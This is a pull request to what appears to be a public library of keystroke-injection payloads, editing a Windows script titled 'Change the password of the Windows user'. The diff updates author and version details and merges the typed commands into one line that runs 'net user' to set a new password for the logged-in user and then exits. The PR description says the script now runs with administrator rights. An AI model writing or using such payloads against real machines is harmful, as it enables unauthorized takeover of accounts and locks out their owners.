### PR TITLE
added admin permissions + more reliable exiting method

### DIFF
--- a/payloads/library/execution/Change_the_password_of_the_windows_user/payload_V2.0.txt
+++ b/payloads/library/execution/Change_the_password_of_the_windows_user/payload_V2.0.txt
@@ -1,9 +1,9 @@
 REM ############################################################
 REM #                                                          |
 REM # Title        : Change the password of the Windows user   |
-REM # Author       : Aleff                                     |
-REM # Version      : 1.0                                       |
-REM # Category     : Execution                                   |
+REM # Author       : Aleff, Eshi_Pizza4all                     |
+REM # Version      : 2.0                                       |
+REM # Category     : Execution                                 |
 REM # Target       : Windows 10-11                             |
 REM #                                                          |
 REM ############################################################
@@ -24,8 +24,4 @@ DELAY 500
 
 DELAY 2000
 STRING net user $env:USERNAME 
-STRING  NEW_PASSWORD
-ENTER
-DELAY 1000
-STRING exit
-ENTER
+STRING  NEW_PASSWORD; exit


### PR DESCRIPTION
On the systems I tested this script on, admin permissoins were required to change the password. I have updated the skript to use those and since exiting PowerShell running as an administrator does not work, I replaced ALT+F4 with typing in "exit".